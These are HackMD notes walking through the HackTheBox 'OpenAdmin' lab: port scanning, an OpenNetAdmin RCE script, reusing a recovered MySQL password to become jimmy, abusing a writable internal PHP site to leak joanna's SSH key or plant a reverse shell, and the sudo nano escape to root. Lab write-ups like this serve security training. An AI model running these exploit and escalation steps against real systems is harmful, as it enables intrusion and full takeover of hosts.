HackMD
HackTheBox OpenAdmin
1. Info
- Name : OpenAdmin
- IP : 10.10.10.171
- OS : Linux
- Difficulty : Easy
2. Nmap
- Payload:
sudo nmap -sC -sV 10.10.10.171 -oA nmap/10.10.10.171
- Port 22: OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
- Port 80: Apache httpd 2.4.29 ((Ubuntu))
- No CVE to use.
3. Web Server
- View:
- A very common Apache2 default paage
- Run on Ubuntu
- Gobuster
- mode: dir
- Payload:
gobuster dir -u "http://10.10.10.171/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out -x html -b 403,404
- Find Dir:
- Dir: /music
- View:
- Explore Web Page
- Most link direct us to same page
- There's interesting link: Login
- Direct us to http://10.10.10.171/ona/
- It's OpenNetAdmin v18.1.1
- Google it!
- There is RCE PoC on ExploitDB, we can try to use it.
- Direct us to http://10.10.10.171/ona/
- View:
4. Exploit OpenNetAdmin
- Exploit RCE: https://raw.githubusercontent.com/amriunix/ona-rce/master/ona-rce.py
- Payload:
- Use vuln checker:
python3 ona-rce.py check http://10.10.10.171/ona/ - Use Exploit:
python3 ona-rce.py exploit http://10.10.10.171/ona/
- Use vuln checker:
- Get Shell!
5. Privilage Escalation To User Jimmy
- Enum User
cat /etc/passwd
- There two user:
- jimmy
- Web Admin
- Web Admin
- joanna
- jimmy
- Find open port
- Find 3306 Port(mysql)
- Explore File
- Interesting File:
- /opt/ona/www/local/config/database_settings.inc.php
- Find database username and passwd
- /opt/ona/www/local/config/database_settings.inc.php
- Interesting File:
- Mysql
- Login in with ona_sys
mysql -u ona_sys -p- Password:
n1nj4W4rri0R!
- Explore Mysql
- Get Databases:
show databases;
- Get Database ona_default's tables:
use ona_default;show tables;
- Interesting Tables: users
- Dump Tables user:
select * from users;
- We get username and password hash
- Use hashcat to decode it
- admin:admin
- guest:test
- Not very useful…
- Get Databases:
- Login in with ona_sys
- Try Login jimmy with su
- Jimmy is web page administrator, maybe he use same password with mysql server
su jimmy- Passwd: n1nj4W4rri0R!
- Success!
5. Privilage Escalation To User Joanna
- Enum
- sudo -l
- Nothing
- Run Linpeas.sh
- Interesting Port:
- Port 3306: Mysql server
- Nothing interesting in Mysql server
- Port 52846: Weird Port
- We can find in
/etc/apache2/sites-available/internal.conf
- Seams like another website
- Web Server is ran by Joanna
- We can find in
- Port 3306: Mysql server
- Interesting User's Group
- Jimmy:uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
- Interesting File(Jimmy Writable)
- /var/www/internal
- Looks like we can write file which ran by internal server
- /var/www/internal
- sudo -l
- Privilage escalation with internal web server
- Explore file in /var/www/internal
- index.php
- Looks like a login page
- Send login request py POST req
- username = jimmy, auth with password hash(sha512)
- logout.php
- Logout, just logout(clean session).
- main.php
- There is a interesting php code
- It redirect us to index.php if wrong passwd, but no
die()function- PHP code will execute but we can't see on web page
- Use Burp Suite to get it
- The web server get joanna's ssh file and send it to internal web server!?
- add id command into main.php
- We can look deep into it
- There is a interesting php code
- index.php
- Explore internal web page
- Forward 52846 port to our attacking machine:
ssh -L 52846:localhost:52846 jimmy@10.10.10.171 - We can view web page: http://127.0.0.1:52846
- There is no
die()function so we can view main.php with out auth by Burp Suite
- Forward 52846 port to our attacking machine:
- Burp Suite
- Use Burp repeater to get 302 response from web page
- The web server print the id command output that we add into main.php
- Also Joanna ssh key
- Web Server run on Joanna privilage
- We can crack Joanna's ssh key's passphrase by john
- Very 吃電腦效能==
- Or add reverse shell in main.php
- Use Burp repeater to get 302 response from web page
- Add reverse shell in main.php
- shell is reverse shell
- Resend request by Burp Suite repeater
- We get joanna!
- Explore file in /var/www/internal
5.Privilage Escalation To Root
- Enum
sudo -l
- We can run
/bin/nano /opt/privby root privilage - We can privilage escalation to root
- Privilage escalation
- Go to GTFOBins
- Search nano
- Run payload:
sudo /bin/nano /opt/priv - In nano:
^R^X(ctrl+r ctrl+x)reset;; sh 1>&0 2>&0
- We get root!
